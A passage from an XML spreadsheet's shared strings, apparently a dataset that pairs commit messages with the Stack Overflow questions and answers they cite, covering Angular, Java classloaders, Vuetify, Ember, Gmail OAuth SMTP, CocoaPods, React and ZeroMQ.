http://stackoverflow.com/questions/34540615/how-do-i-inject-a-parent-component-into-a-child-component
Made variables private</t>
  </si>
  <si>
    <t>See @EricMartinez's comment for the answer.  The problem seems to be a circular reference when A imports B and B imports A.
Here's a plunker that uses two files instead of the one file that is in Eric's plunker.
The only change from my original plunker is in the ChildComponent:
import {Component, Inject, forwardRef} from 'angular2/core';
// ....
constructor(@Inject(forwardRef(() =&gt; AppComponent)) private _parent:AppComponent)
I don't know for sure if this eliminates the circular reference, since A and B are still importing each other, but it seems to work.
See also https://github.com/angular/angular/issues/3216, where Miško states:
This [not user-friendly declaration using forwardRef()] is a limitation of JS and how the function declarations get hoisted. Whenever you have a circular dependency you will need forwardRef :-( I just don't see a away around it.
I would argue that you should not be in situation where your parent needs to know about the children and children need to know about parent. @Query should take care of most of the use cases.
I am sorry, but while I agree this is a pain in some rare cases, I don't see a way out of it, and hence this issue is not actionable, will close.
Hmm... the reason I tried injecting the parent was because I see two ways for a child to communicate with a parent:
the child defines output properties and emits events, which the parent subscribes to
the child injects the parent (e.g., Pane might inject Tabs) and can then call methods on the parent
And I was trying to determine when to use each approach.  Miško makes it sound like 2. should be rare.
Update: I was thinking about this some more... 1. is better because there is less coupling between the child and the parent.  With 1. the child doesn't need to know (and probably shouldn't know) the public API/interface of the parent.  In the reverse direction (e.g., the parent uses @ViewChild (@Query is now deprecated) to get a reference to the child, then calls methods on the child), the coupling is fine, because the parent is using the child component, so it needs to know the public API/interface of the child: i.e., the input and output properties and public methods.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing a React Native application using Expo and expo-router. In one of my screens, I am dynamically updating the header using Stack.Screen to display the filter inside the header. Here is a simplified version of my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export default function Home() {
  const [filter, setFilter] = useState('');
  return (
    &amp;lt;&amp;gt;
      &amp;lt;Stack.Screen
        options={{
          headerRight: () =&amp;gt; (
            &amp;lt;HeaderRight
              text={filter}
            /&amp;gt;
          ),
        }}
      /&amp;gt;
      &amp;lt;SafeAreaView&amp;gt;
        &amp;lt;SearchInput input={filter} onChangeInput={setFilter} /&amp;gt;
        &amp;lt;FlatList
          data={someData}
          renderItem={(item) =&amp;gt; &amp;lt;Card city={item.item} /&amp;gt;}
          keyExtractor={(item) =&amp;gt; item.id}
        /&amp;gt;
      &amp;lt;/SafeAreaView&amp;gt;
    &amp;lt;/&amp;gt;
  );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this a safe thing to do or not?&lt;/p&gt;
&lt;p&gt;Maybe someone has a better solution for this?
It seems like the Stack.Screen has no &lt;code&gt;component&lt;/code&gt; parameter and can not accept &lt;code&gt;children&lt;/code&gt;. Thats why I included it like this using the React Fragment.&lt;/p&gt;
&lt;p&gt;I used to have a global state within my Root _layout file to update this filter in my header. However this slowed my application down when changing the filter by typing into the input field. Probably because this lead to some unnecessary rerenders.&lt;/p&gt;
&lt;p&gt;I am looking forward to some suggestions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C11</t>
  </si>
  <si>
    <t>[HUDI-2321] Use the caller classloader for ReflectionUtils (#3535)
Based on the discussion on stackoverflow:
https://stackoverflow.com/questions/1771679/difference-between-threads-context-class-loader-and-normal-classloader
The Thread.currentThread().getContextClassLoader() should never be used
because the context classloader is not immutable, user can overwrite it
when thread switches, it is also nullable.
The objection here: https://stackoverflow.com/a/36228195 says the
Thread.currentThread().getContextClassLoader() is a JDK design error
and the context classloader is never suggested to be used. The API that
needs classloader should ask the user to set up the right classloader.</t>
  </si>
  <si>
    <t>This does not answer the original question, but as the question is highly ranked and linked for any ContextClassLoader query, I think it is important to answer the related question of when the context class loader should be used. Short answer: never use the context class loader! But set it to getClass().getClassLoader() when you have to call a method that is missing a ClassLoader parameter.
When code from one class asks to load another class, the correct class loader to use is the same class loader as the caller class (i.e., getClass().getClassLoader()). This is the way things work 99.9% of the time because this is what the JVM does itself the first time you construct an instance of a new class, invoke a static method, or access a static field.
When you want to create a class using reflection (such as when deserializing or loading a configurable named class), the library that does the reflection should always ask the application which class loader to use, by receiving the ClassLoader as a parameter from the application. The application (which knows all the classes that need constructing) should pass it getClass().getClassLoader().
Any other way to obtain a class loader is incorrect. If a library uses hacks such as Thread.getContextClassLoader(), sun.misc.VM.latestUserDefinedLoader(), or sun.reflect.Reflection.getCallerClass() it is a bug caused by a deficiency in the API. Basically, Thread.getContextClassLoader() exists only because whoever designed  the ObjectInputStream API forgot to accept the ClassLoader as a parameter, and this mistake has haunted the Java community to this day.
That said, many many JDK classes use one of a few hacks to guess some class loader to use. Some use the ContextClassLoader (which fails when you run different apps on a shared thread pool, or when you leave the ContextClassLoader null), some walk the stack (which fails when the direct caller of the class is itself a library), some use the system class loader (which is fine, as long as it is documented to only use classes in the CLASSPATH) or bootstrap class loader, and some use an unpredictable combination of the above techniques (which only makes things more confusing). This has resulted in much weeping and gnashing of teeth.
When using such an API, first, try to find an overload of the method that accepts the class loader as a parameter. If there is no sensible method, then try setting the ContextClassLoader before the API call (and resetting it afterwards):
ClassLoader originalClassLoader = Thread.currentThread().getContextClassLoader();
try {
    Thread.currentThread().setContextClassLoader(getClass().getClassLoader());
    // call some API that uses reflection without taking ClassLoader param
} finally {
    Thread.currentThread().setContextClassLoader(originalClassLoader);
}</t>
  </si>
  <si>
    <t>Each class will use its own classloader to load other classes. So if ClassA.class references ClassB.class then ClassB needs to be on the classpath of the classloader of ClassA, or its parents.
The thread context classloader is the current classloader for the current thread. An object can be created from a class in ClassLoaderC and then passed to a thread owned by ClassLoaderD.  In this case the object needs to use Thread.currentThread().getContextClassLoader() directly if it wants to load resources that are not available on its own classloader.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on an app which aims to give an optimized weekly planning considering multiple constraints ( Hours per week, availabilities of each person, etc... ). My app is built entirely with node js, and i'm using &lt;a href="https://www.npmjs.com/package/glpk.js" rel="nofollow noreferrer"&gt;glpk.js&lt;/a&gt;. It is working quite well, and i'm able to generate my planning, but i'm struggling while adding a new constraint to my LP problem.&lt;/p&gt;
&lt;p&gt;Basically, i want each employee's shift to last at least 3 hours.&lt;/p&gt;
&lt;p&gt;Here are my types, employeer's availabilities is an array of 14 (number of shift per week) number (0, or 1) where each value represent an employee availability for the shift 'x'  :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export interface LPEmployeeInput {
  id: number;
  name: string;
  availability: number[];
  hoursPerWeek: number;
  formations: string[];
}
export interface LPDailyNeed {
  hour: number;
  kitchen: number;
  service: number;
  manager: number;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is an example of a daily need :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[
        { hour: 11, kitchen: 1, service: 1, manager: 1 },
        { hour: 12, kitchen: 1, service: 2, manager: 1 },
        { hour: 13, kitchen: 1, service: 2, manager: 1 },
        { hour: 14, kitchen: 1, service: 2, manager: 1 },
        { hour: 18, kitchen: 2, service: 1, manager: 1 },
        { hour: 19, kitchen: 2, service: 2, manager: 1 },
        { hour: 20, kitchen: 2, service: 2, manager: 1 },
        { hour: 21, kitchen: 2, service: 1, manager: 1 }
]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is the LP solve code :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const lp: LP = {
    name: 'Employee Scheduling',
    objective: {
        direction: glpk.GLP_MAX,
        name: 'total_hours',
        vars: []
    },
    subjectTo: []
};
// Add daily hours constraints
for (let i = 0; i &amp;lt; numEmployees; i++) {
    for (let j = 0; j &amp;lt; numDays; j++) {
        const noonVars: any[] = [];
        const eveningVars: any[] = [];
        for (let k = 0; k &amp;lt; dailyNeeds[j].length; k++) {
            if(dailyNeeds[j][k].hour &amp;lt; shiftBreakpoint &amp;amp;&amp;amp; employees[i].availability[j * 2] == 1){
                //NOON
                noonVars.push({ name: `x_${i}_${j}_${k}`, coef: 1 });
            } else if(dailyNeeds[j][k].hour &amp;gt;= shiftBreakpoint &amp;amp;&amp;amp; employees[i].availability[j * 2 + 1] == 1){
                //EVENING
                eveningVars.push({ name: `x_${i}_${j}_${k}`, coef: 1 });
            }
        }
        if(employees[i].availability[j * 2] == 1){
            lp.subjectTo.push({
                name: `daily_hours_${i}_${j}_noon`,
                vars: noonVars,
                bnds: { type: glpk.GLP_LO, ub: Infinity, lb: 2 }
            });
        }
        if(employees[i].availability[j * 2 + 1] == 1){
            lp.subjectTo.push({
                name: `daily_hours_${i}_${j}_evening`,
                vars: eveningVars,
                bnds: { type: glpk.GLP_LO, ub: Infinity, lb: 2 }
            });
        }
    }
}
// Than there is Others constraints
// Solve the problem
const result = glpk.solve(lp, glpk.GLP_MSG_ALL);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;EDIT : In the following code, i'm adding a constraint that ensure an employee that come to work for a shift will work at least two hours. Now how can I keep this constraint while still accepting an employee to work 0 hours on a day.&lt;/p&gt;
&lt;p&gt;I've been reading the &lt;a href="https://www.chiark.greenend.org.uk/doc/glpk-doc/glpk.pdf" rel="nofollow noreferrer"&gt;glpk docs&lt;/a&gt; since a moment now, but i'm struggling findin a solution. The 'glpk.GLP_DP' seems to not work in my case, cause i need the number of hours to be &amp;lt;= 0 or &amp;gt;= 3 which does not work together.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C110</t>
  </si>
  <si>
    <t>[feature][notes] Dashboard: Implemented Session delete logic and button
Created a custom component that wraps around the dialog logic and provides a promise - which can be used to get user's choice from the component.
I believe this kind of promise based confirmation needs to be a standard feature in vuetify dialog.
Implementation Reference: https://stackoverflow.com/questions/56026220/how-to-programmatically-launch-a-vuetify-dialog-and-wait-for-the-response/57937480#57937480</t>
  </si>
  <si>
    <t>Ended up solving it this way:
I have a method called mbox (returns a promise) that creates a an instance of my component, adds it to the DOM, and then watches a property on that component to know which option the user chose. Resolves the promise once the user has chosen an option
My mbox method:
import MBOX from './components/mbox.vue';
import _Vue from 'vue';
export default {
mbox(mText, mTitle, mBtnCap1, mBtnCap2, mBtnCap3){
    return new Promise(async (resolve, reject) =&gt; {
        if (!mTitle){
            mTitle = 'My Title';
        }
        if (!mBtnCap1){
            mBtnCap1 = 'OK';
        }
        // I'm combining a bunch of stuff to make this work.
        // First, create the vue component
        var mboxInstance = _Vue.extend(MBOX); // mbox component, imported at top of Sublib
        var oComponent = new mboxInstance({ 
            propsData: { 
                msg: mText, 
                title: mTitle, 
                btnCap1: mBtnCap1, 
                btnCap2: mBtnCap2, 
                btnCap3: mBtnCap3,
                retval: 0
                }
        }).$mount();
        // now add it to the DOM
        var oEl = document.getElementById('app').appendChild(oComponent.$el);
        // NOTE: couldn't get it to work without adding a 'button' to activate it
        // progrmatically click it and make the button invisible
        // document.getElementById('mbox_btn_launch').click();
        var oLuanchBtn = document.getElementById('mbox_btn_launch');
        oLuanchBtn.style.visibility = 'hidden';
        oLuanchBtn.click();
        // Add a listener so we can get the value and return it
        oComponent.$watch('retval', function(newVal, oldVal){
            // this is triggered when they chose an option
            // Delete the component / element now that I'm done
            oEl.remove();
            resolve(Number(newVal));
        })
    }); // promise
}, // mbox
}
And My MBOX component:
&lt;template&gt;
&lt;v-dialog max-width="290" persistent v-if="showMbox"&gt;
    &lt;template v-slot:activator="{on}"&gt;
        &lt;v-btn id="mbox_btn_launch" v-on="on"&gt;
            Test
        &lt;/v-btn&gt;
    &lt;/template&gt;
    &lt;v-card&gt;
        &lt;v-card-title&gt;{{title}}&lt;/v-card-title&gt;
        &lt;v-card-text&gt;{{msg}}&lt;/v-card-text&gt;
        &lt;v-card-actions&gt;
            &lt;v-spacer&gt;&lt;/v-spacer&gt;
            &lt;v-btn v-if="btnCap1" @click="btnClicked('1')"&gt;{{btnCap1}}&lt;/v-btn&gt;
            &lt;v-btn v-if="btnCap2" @click="btnClicked('2')"&gt;{{btnCap2}}&lt;/v-btn&gt;
            &lt;v-btn v-if="btnCap3" @click="btnClicked('3')"&gt;{{btnCap3}}&lt;/v-btn&gt;
        &lt;/v-card-actions&gt;
    &lt;/v-card&gt;
&lt;/v-dialog&gt;
&lt;/template&gt;
&lt;script&gt;
export default {
    name: 'mbox',
    data: () =&gt; ({
        showMbox: true    
    }),
    props: [
        // these can be passed in, the 'data' stuff can't
        'msg',
        'title',
        'btnCap1',
        'btnCap2',
        'btnCap3',
        'retval' // watches this so we know when they clicked something
    ],
    created(){    
        this.showMbox = true;
    }, 
    methods: {
    btnClicked: function(mBtnClicked){
        // mBtnClicked = Char. Has to be a character in order for it to pass it in. Not sure why, numerics didn't work
        mBtnClicked = Number(mBtnClicked);
        this.retval = mBtnClicked; // watcher in Sublib will detect this value has changed
        this.showMbox = false;
    } // btnClicked
} // methods
} // export default
&lt;/script&gt;
&lt;style scoped&gt;
&lt;/style&gt;
I can then call it like so:
var mChoice = await mbox('What do you want to do?', 'Title', 'Option 1', 'Option 2');
or for a simple 'validation' prompt:
if (!userName){
    mbox('You must enter a username');
    return;
}</t>
  </si>
  <si>
    <t xml:space="preserve">We are beginning to go down the path of mobile browser support for an enterprise e-commerce webapp (Java/Servlet based).  Of course there are many decisions to be made, but it seems to me the cornerstone is to be able to reliably detect mobile browsers, and make decisions on the content to be returned accordingly.  Is there a standard way to make this determination (quickly) based on the http request, and ideally glean more information about the given browser and device making the request (screen size, html capabilities, etc?).
I would also appreciate any supplemental information that would be of use from someone who has gone down this path of taking an existing large scale enterprise webapp and architect-ing out mobile browser support from the development side.
[edit] I certainly understand the request header and the information about a database of standard user agents is a great help.  For those talking about 'other' request header properties, if you could include similar standardized name / resource of values that would be a big help.
[edit] Several users have proposed solutions that involve a call over the wire to some web service that will do the detection.  While I'm sure this works, it is not a good solution for an enterprise e-commerce site for two reasons: 1) speed.  A call over the wire for every page request to a third party would have huge performance implications.  2) dependency/legal.  We'd tie our website response time and key functionality to their service, which is horrible for legal and risk reasons.
</t>
  </si>
  <si>
    <t>C111</t>
  </si>
  <si>
    <t>feat(component): Multiple models in index:
http://stackoverflow.com/questions/20521967/emberjs-how-to-load-multiple-models-on-the-same-route</t>
  </si>
  <si>
    <t>NOTE: for Ember 3.16+ apps, here is the same code, but with updated syntax / patterns:
https://stackoverflow.com/a/62500918/356849
The below is for Ember &lt; 3.16, even though the code would work as 3.16+ as fully backwards compatible, but it's not always fun to write older code.
You can use the
Ember.RSVP.hash
to load several models:
app/routes/index.js
import Ember from 'ember';
export default Ember.Route.extend({
  model() {
    return Ember.RSVP.hash({
      people: this.store.findAll('person'),
      companies: this.store.findAll('company')
    });
  },
  setupController(controller, model) {
    this._super(...arguments);
    Ember.set(controller, 'people', model.people);
    Ember.set(controller, 'companies', model.companies);
  }
});
And in your template you can refer to
people
and
companies
to get the loaded data:
app/templates/index.js
&lt;h2&gt;People:&lt;/h2&gt;
&lt;ul&gt;
  {{#each people as |person|}}
    &lt;li&gt;{{person.name}}&lt;/li&gt;
  {{/each}}
&lt;/ul&gt;
&lt;h2&gt;Companies:&lt;/h2&gt;
&lt;ul&gt;
  {{#each companies as |company|}}
    &lt;li&gt;{{company.name}}&lt;/li&gt;
  {{/each}}
&lt;/ul&gt;
This is a Twiddle with this sample:
https://ember-twiddle.com/c88ce3440ab6201b8d58</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating an access token with the scope &lt;code&gt;https://mail.google.com/&lt;/code&gt;. But when authenticating with the gmail SMTP server I get the error &lt;code&gt;eyJzdGF0dXMiOiI0MDAiLCJzY2hlbWVzIjoiQmVhcmVyIiwic2NvcGUiOiJodHRwczovL21haWwuZ29vZ2xlLmNvbS8ifQ==&lt;/code&gt; which translates to &lt;code&gt;{&amp;quot;status&amp;quot;:&amp;quot;400&amp;quot;,&amp;quot;schemes&amp;quot;:&amp;quot;Bearer&amp;quot;,&amp;quot;scope&amp;quot;:&amp;quot;https://mail.google.com/&amp;quot;}&lt;/code&gt;. Since I already have that scope in the access token I'm not sure what I'm doing wrong.&lt;/p&gt;
&lt;p&gt;Here is my full code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import base64
import email
import random
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from smtplib import SMTP
import google_auth_oauthlib.flow
flow = google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file('credentials.json', ['https://mail.google.com/'])
creds = flow.run_local_server(port=5000)
print(creds.to_json())
auth_token = 'user=USER@gmail.com\x01token=Bearer ' + creds.token + '\x01\x01'
#print(auth_token.encode('ascii'))
oauth2token = base64.b64encode(auth_token.encode('ascii')).decode('ascii')
with SMTP('smtp.gmail.com', 587, 'localhost') as smtp:
    smtp.set_debuglevel(2)
    smtp.starttls()
    smtp.ehlo()
    smtp.docmd('AUTH XOAUTH2 '+oauth2token)
    smtp.noop()
    smtp.quit()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I already tried adding more scopes to the access token. The following where tried: &lt;code&gt;openid, https://www.googleapis.com/auth/gmail.send, https://www.googleapis.com/auth/gmail.modify, https://www.googleapis.com/auth/userinfo.profile, https://www.googleapis.com/auth/userinfo.email&lt;/code&gt;. Sadly that didn't change a thing. Also tried searching but all I found was people missing the mail.google.com scope.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C112</t>
  </si>
  <si>
    <t>podspec with optional components as subspecs
ToDo: Add OpenSSL static library to AppReceiptVerificator subspec. See:
http://stackoverflow.com/questions/19481125/add-static-library-to-podspe
c</t>
  </si>
  <si>
    <t>I managed to add the static library as a subspec. I prefer this approach because it uses the build shipped with my pod by default, and also enables users to provide their own build if they so desire.
As mentioned, the static library is OpenSSL but the following applies to any static library. I'm using the following directory structure:
libraries/openssl-1.0.1e/include/openssl/*.h
libraries/openssl-1.0.1e/LICENSE
libraries/openssl-1.0.1e/lib/*.a
The resulting subspec would be:
s.subspec 'OpenSSL' do |openssl|
    openssl.preserve_paths = 'libraries/openssl-1.0.1e/include/openssl/*.h', 'libraries/openssl-1.0.1e/include/LICENSE'
    openssl.vendored_libraries = 'libraries/openssl-1.0.1e/lib/libcrypto.a', 'libraries/openssl-1.0.1e/lib/libssl.a'
    openssl.libraries = 'ssl', 'crypto'
    openssl.xcconfig = { 'HEADER_SEARCH_PATHS' =&gt; "${PODS_ROOT}/#{s.name}/libraries/openssl-1.0.1e/include/**" }
end
Line by line:
openssl.preserve_paths = 'libraries/openssl-1.0.1e/include/openssl/*.h', 'libraries/openssl-1.0.1e/include/LICENSE'
Preserve headers and the license file. We will use the headers below.
openssl.vendored_libraries = 'libraries/openssl-1.0.1e/lib/libcrypto.a', 'libraries/openssl-1.0.1e/lib/libssl.a'
Tell CocoaPods that we are shipping the above static libraries in the pod. This will preserve the files, as well as modifying LIBRARY_SEARCH_PATHS accordingly.
openssl.libraries = 'ssl', 'crypto'
Includes the libraries in "Other Linker Flags".
openssl.xcconfig = { 'HEADER_SEARCH_PATHS' =&gt; "${PODS_ROOT}/#{s.name}/libraries/openssl-1.0.1e/include/**" }
Tells the project where to find the headers. We cannot use public_header_files because this is a subspec.</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a way to call an EJB that is served through WebSphere (iiop://host:port/ejbName) from a vanilla JRE (like Sun). A lot of people have been telling me that this type of architecture relies in a homogenous environment. Thoughts?
</t>
  </si>
  <si>
    <t>C113</t>
  </si>
  <si>
    <t>App component has width/height state, responds to resize, from http://stackoverflow.com/questions/36862334/get-viewport-window-height-in-reactjs</t>
  </si>
  <si>
    <t>Using Hooks (React 16.8.0+)
Create a useWindowDimensions hook.
import { useState, useEffect } from 'react';
function getWindowDimensions() {
  const { innerWidth: width, innerHeight: height } = window;
  return {
    width,
    height
  };
}
export default function useWindowDimensions() {
  const [windowDimensions, setWindowDimensions] = useState(getWindowDimensions());
  useEffect(() =&gt; {
    function handleResize() {
      setWindowDimensions(getWindowDimensions());
    }
    window.addEventListener('resize', handleResize);
    return () =&gt; window.removeEventListener('resize', handleResize);
  }, []);
  return windowDimensions;
}
And after that you'll be able to use it in your components like this
const Component = () =&gt; {
  const { height, width } = useWindowDimensions();
  return (
    &lt;div&gt;
      width: {width} ~ height: {height}
    &lt;/div&gt;
  );
}
Working example
Original answer
It's the same in React, you can use window.innerHeight to get the current viewport's height.
As you can see here</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using EvoPdf version 7.5. We have this html that has been used to generate a pdf report for quite some time with no issues, but its just straight up HTML and css, there was not javascript being used. We want to add charts using chart.js, but when I add it to the existing report to test if it will show, nothing appears.&lt;/p&gt;
&lt;p&gt;Here is my HTML&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@using System.Linq
@using RazorEngine
@using System.Text.RegularExpressions
&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;meta charset=&amp;quot;utf-8&amp;quot; /&amp;gt;
    &amp;lt;link href=&amp;quot;https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css&amp;quot; rel=&amp;quot;stylesheet&amp;quot;&amp;gt;
    &amp;lt;link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/bootstrap-icons@1.7.2/font/bootstrap-icons.css'&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body id=&amp;quot;Body&amp;quot;&amp;gt;
    &amp;lt;div class=&amp;quot;section&amp;quot;&amp;gt;
        &amp;lt;div class=&amp;quot;mx-auto&amp;quot; style=&amp;quot;height: 50px;&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
        &amp;lt;div class=&amp;quot;lblTitle&amp;quot;&amp;gt;
            &amp;lt;h1&amp;gt;This is where the chart should be&amp;lt;/h1&amp;gt;
            &amp;lt;div style=&amp;quot;width: 80%; margin: auto;&amp;quot;&amp;gt;
                &amp;lt;canvas id=&amp;quot;myChart&amp;quot;&amp;gt;&amp;lt;/canvas&amp;gt;
            &amp;lt;/div&amp;gt;
            &amp;lt;h1&amp;gt;This is where the chart should end&amp;lt;/h1&amp;gt;
        &amp;lt;/div&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;script src=&amp;quot;https://cdn.jsdelivr.net/npm/chart.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
    &amp;lt;script src=&amp;quot;~/Scripts/local_chart.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is a sample of the javascript&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const ctx = document.getElementById('myChart');
const startPoint = 58, progressPoint = 65, maxPoint = 100;
const xAxisLabel = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul'];
const expected = (start, end, steps) =&amp;gt; {
    const stepSize = (end.y - start.y) / steps;
    return Array.from({ length: steps + 1 }, (_, i) =&amp;gt; ({ x: i &amp;lt; steps ? start.x : end.x, y: start.y + stepSize * i }));
};
const customPointCircleCanvas = (ctx, size = 10) =&amp;gt; ({
    draw: ({ point: { x, y } }) =&amp;gt; {
        ctx.beginPath();
        ctx.arc(x, y, size, 0, 2 * Math.PI);
        ctx.fillStyle = '#3498db';
        ctx.fill();
        ctx.lineWidth = 3;
        ctx.strokeStyle = '#FFFFFF';
        ctx.stroke();
    }
});
const htmlPlanTimelineLegendPlugin = {
    id: 'htmlLegend',
    afterUpdate(chart, _, { containerID }) {
        const container = document.getElementById(containerID);
        if (!container) return;
        container.innerHTML = '';
        chart.legend.legendItems.forEach(({ fillStyle, text }, index) =&amp;gt; {
            const legendDiv = document.createElement('div');
            legendDiv.innerHTML = `&amp;lt;span style=&amp;quot;background:${fillStyle};width:10px;height:10px;display:inline-block;margin-right:5px;&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;${text}`;
            legendDiv.style.cursor = 'pointer';
            legendDiv.onclick = () =&amp;gt; {
                chart.setDatasetVisibility(index, !chart.isDatasetVisible(index));
                chart.update();
            };
            container.appendChild(legendDiv);
        });
    }
};
const getGradient = (ctx, { left, right, bottom, top }, colorStart, colorEnd, isVertical = false) =&amp;gt; {
    if (!left) return;
    const gradient = ctx.createLinearGradient(isVertical ? 0 : left, isVertical ? bottom : 0, isVertical ? 0 : right, isVertical ? top : 0);
    gradient.addColorStop(0, colorStart);
    gradient.addColorStop(1, colorEnd);
    return gradient;
};
new Chart(ctx, {
    type: 'line',
    data: {
        labels: xAxisLabel,
        datasets: [
            { label: 'Label 1', data: expected({ x: 'Jan', y: startPoint }, { x: 'Apr', y: maxPoint }, 7), borderColor: 'transparent', pointRadius: 0, spanGaps: true },
            { label: 'Label 2', data: expected({ x: 'Jan', y: startPoint }, { x: 'Jan', y: startPoint }, 1), pointStyle: 'circle', pointRadius: 7, borderColor: '#FFF', backgroundColor: '#3498db' },
            { label: 'Label 3', data: expected({ x: 'Mar', y: progressPoint }, { x: 'Mar', y: progressPoint }, 1), pointStyle: 'circle', pointRadius: 30, borderColor: '#FFF', backgroundColor: '#3498db' },
            {
                label: 'Label 4',
                data: [ { x: 'Jan', y: startPoint }, { x: 'Mar', y: progressPoint }, { x: 'Jul', y: maxPoint } ],
                segment: {
                    borderDash: (ctx) =&amp;gt; ctx.p0.skip || ctx.p1.skip ? [6, 6] : undefined,
                    backgroundColor: ({ chart: { ctx, chartArea } }) =&amp;gt; getGradient(ctx, chartArea, 'rgba(205, 205, 205, 0.4)', 'rgba(255, 99, 132, 0.4)', true) || 'transparent'
                },
                spanGaps: true, radius: 0,
                borderColor: ({ chart: { ctx, chartArea } }) =&amp;gt; getGradient(ctx, chartArea, 'rgba(52, 152, 219, 1)', 'rgba(255, 99, 132, 0.4)') || 'transparent',
                borderWidth: 3, backgroundColor: 'rgba(255, 99, 132, 0.4)', fill: 'stack'
            }
        ]
    },
    options: {
        responsive: true,
        events: [],
        scales: {
            y: { grid: { display: false }, title: { display: true, text: 'Y Scale', font: { family: 'Arial', size: 20 } }, ticks: { maxTicksLimit: 5, callback: (value) =&amp;gt; `${value}%` } },
            x: { grid: { display: false }, title: { display: true, text: 'X Scale', font: { family: 'Arial', size: 20 } } }
        },
        plugins: {
            htmlLegend: { containerID: 'legend-container' },
            legend: { display: true, labels: { color: 'black' } }
        }
    },
    plugins: [htmlPlanTimelineLegendPlugin]
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is all I see
&lt;a href="https://i.sstatic.net/fsOYL16t.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/fsOYL16t.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I know the code works because I added it to one of our web pages (we use Asp.Net) and it renders just fine there:
&lt;a href="https://i.sstatic.net/kRJLwob8.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/kRJLwob8.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I tried setting the JavaScriptEnabled to true when setting up the converter, but that didnt really seem to make a difference.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var htmlToPdfConverter = new HtmlToPdfConverter { LicenseKey = _evoLicenceKey };
htmlToPdfConverter.PdfDocumentOptions.PdfPageSize = GetPageSize(_principal.Profile.CountryCode);
htmlToPdfConverter.PdfDocumentOptions.TopMargin = 20f;
htmlToPdfConverter.PdfDocumentOptions.RightMargin = 20f;
htmlToPdfConverter.PdfDocumentOptions.BottomMargin = 20f;
htmlToPdfConverter.PdfDocumentOptions.LeftMargin = 20f;
htmlToPdfConverter.PdfDocumentOptions.FitWidth = true;
htmlToPdfConverter.PdfDocumentOptions.EmbedFonts = true;
htmlToPdfConverter.JavaScriptEnabled = true; // Enable JavaScript execution
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Am I missing a setting? Does version 7.5 allow this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C114</t>
  </si>
  <si>
    <t>Added a "debug mode" used to discover the reason why components were 
being computed incorrectly (described at http://stackoverflow.com/questions/7545542/find-all-connected-components-given-the-connections-in-a-graph-java/7552873#7552873 )</t>
  </si>
  <si>
    <t>Per comments on the OP above --
For anyone interested, I completely redesigned the algorithm (which essentially maps a set of unique two-way edges to a set of connected components [size &gt; 2]). You can find it in the github repo at
https://github.com/IceCreamYou/ViralSpread/blob/master/Statistics.java</t>
  </si>
  <si>
    <t xml:space="preserve">There are [external-link] available these days, for pretty much every language out there.  In your experience, what are their strengths, weaknesses, and unique features?  Assuming the luxury of choice, what factors would lead you to consider one over another other?
I'm most interested in people's direct experience with one or more frameworks, rather than an exhaustive comparison of everything out there.  Hopefully the SO community has programmers who have good and bad experiences with things like [external-link], [external-link], [external-link], [external-link], or [external-link].  It would also be great to hear if anyone is using one of the less mainstream frameworks like [external-link] or [external-link].
Programming language is an obvious difference, but a Java vs Ruby flamewar won't be much fun, and most of these frameworks seem to be at least as much an investment in technology, tools and complexity as their language of choice; so I'm more interested in things like:
Development speed and convenience
Barriers to entry - both in terms of developer training, and of infrastructure needed
Lock-in - how much code could you keep if you had to switch frameworks?
Flexibility - does the framework dictate your architecture or design?  (Whether that would be a good or bad thing is probably best left to a separate discussion.)
Performance, scalability, and stability - obviously depending on the developers!
</t>
  </si>
  <si>
    <t>C115</t>
  </si>
  <si>
    <t>Fix ZeroMQ components initialization
SO: https://stackoverflow.com/questions/67214907/zeromq-with-spring-spring-integration-zeromq
The `Mono` is created in several places in ZeroMQ components from their constructors.
That leads to the reactive stream to be configured just after ctor, which will ignore
any changes to the options which are used from that `Mono` definition.
For example this code `.doOnNext(this.sendSocketConfigurer)` is done once during
reactive stream definition.
* Fix all the ZeroMQ components to defer usage of the options which could be changed
after ctor initialization
* Cover affected option changes in the tests</t>
  </si>
